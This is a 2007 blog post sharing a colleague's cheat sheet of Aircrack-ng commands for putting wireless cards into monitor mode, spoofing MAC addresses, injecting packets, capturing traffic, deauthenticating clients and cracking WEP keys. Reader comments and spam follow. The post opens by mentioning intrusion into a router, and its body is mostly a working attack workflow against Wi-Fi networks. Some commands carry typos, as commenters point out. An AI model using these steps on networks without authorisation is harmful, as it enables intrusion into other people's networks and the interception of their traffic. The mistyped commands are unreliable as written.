Thursday, November 1, 2007

Hacking and Cracking Wireless

One day after intruding into the router, i remembered my colleague Mark compiled a list of Aircrack-ng commands for cracking and injection. He was doing a wireless project and managed to capture the commands needed when doing the pentest. Check it out. This is a summarized version of the Aircrack-ng commands and it comes in very handy when doing a wireless audit and save you the time needed to read manuals. Use it in your next wireless audit. Thank you Mark for the compilation and your effort.


--------------------------------------------------------------------

install madwifi-ng driver (done! monitor mode working)
install rt73 driver for dlink usb (done! monitor mode working)
install rtutilt for rausb0 configuration
install aircrack-ng (done dev version from svn)



Steps:

#####################################################
CONFIGURATION:

D-Link DWL-G122

ifconfig rausb0 up
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1
iwconfig rausb0 mode monitor OR
airmon-ng start rausb0 channel


NetGear WG511T

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

specify channel
iwocnfig ath0 channel n
########################################################

CHANGING MAC ADDRESS

ifconfig ath0 down
ifconfig ath0 hw ether
ifconfig ath0 up

use macchanger instead

#########################################################

INJECTION TESTING

NetGear WG511T
aireplay-ng -9
===================
D-Lnk DWL G122

aireplay-ng -9 (if this doesn't work it means no ap on same channel found)
Try card-to-card injection below:
====================

Card-To-Card Injection:
Make sure they are on same channel using (channel hopping does not work on D-Link DWL G122???)
iwlist channel (to find out the current channel set)

aireplay-ng -9 -i ath0 rausb0 (ath0 will mimic an access point)
aireplay-ng -9 -i rausb0 ath0 (rausb0 will mimic an access point)
=====================



########################################################




PACKET CAPTURE:

airodump-ng device (find out first the interested bssid and channel)

Then capture packets on that particular channel:

airodump-ng --channel --bssid -w dumpfile device(ath0/rausb0

Notes: capture full packets when using PTW attack (don't dump ivs only)

MERGING capture files (RESUMING)

mergecap -w out.cap test1.cap test2.cap test3.cap

FOR IVS

use ivstools



############################################################

ATTACKS

You may want to associate to ap first using fakeauth before any test
aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0 -h 06:14:6c:4c:b9:7c ath0

Automatic Association:
ireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0




ARP replay (for wep cracking PTW method):
if RXQ in airodump window is > 90 then #/s = 200+ (watch for #Data, it contains IV)

aireplay-ng --arpreplay -b -h device

Deauthentication (to capture WPA handshake, reveal hidden SSID)
Fake Authentication (to authenticate to AP in case needed before we can inject)



#############################################################
WEP CRACKING

Using PTW attack (version 0.9+ only) Packets must be ARP (from arp-replay)

aircrack-ng -z -b dumpfile*.cap
40-bit = 20,000
104-bit = 40,000

Normal Attack
-n 64 (test if 40-bin WEP) remove -n for 104-bit (default)
aircrack-ng -n 64 -a 1 capturefile




#########################################################

RESOLVE MAC Address to IP Address

use netdiscover or ARP tools

##########################################################

Determine the frequency on a particular channel
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select "Wifi Channel Selection and Channel Overlap" tab.


#######################################################

Increasing injection Speed

iwconfig device rate 11M


#####################################################


---------------------------------------------------------------------------


The Hacka Man

9 comments:

Anonymous said...

Have you personally try those commands in pentesting? YES or NO?

Are you using 'aircrack-ng suit' in MS Windows or Linux? or VM in windows? or Live-CD/USB?

Have you tried Auditor/Backtrack/Backtrack2/CoWAPPty with success wireless pentesting??

Do you agree any 'Certified IT' programme will not accept 'typo error' especially in 'Command'?

I'm just curios and all this bring to me what tools you use in your earlier post regarding gainning access to a router, how you did it too?

Are you using CommView for WiFi/Cain & Abel/Wireshark?

Anonymous said...

Hi there.. mark here. thanks for acknowledging me dude. Here's my response to the previous post. The commands I have noted are not step by step walkthrough on wireless pentesting. I got everything working on my

I am: said...

here's the link to my blog.. http://matat0.blogspot.com

Anonymous said...

hi,thanks.i try and rt73 very good chipset.support injection.i can get the ket around 3 minute with windows+vmware.just find tutorial here Tutorial Cracking WEP In 3 Minute

Anonymous said...

When you "copy paste" a cracking tutorial, for your own sake please at least try it first. The guy before already pointed about your error in command typo, yet you still didn't find it? what a great certified hacker.

Anonymous said...

[color=#5588aa]How to utilize the advanced search? It was extended because, [/color] [url=http://carlimelkpart.chez.com/nexium.html] need[/url] [color=#5588aa]search criteria[/color]!
[color=#5588aa]Thanks for the sake of the treatment of waiting representing all![/color]

Nikola said...

The average length of an orgasm for a pig is 30 minutes.online cash advance

Nikola said...

The king of hearts is the only king without a moustache.notebook reviews

William said...

If you compare the weight, a hamburger is more expensive than a car.Contact lenses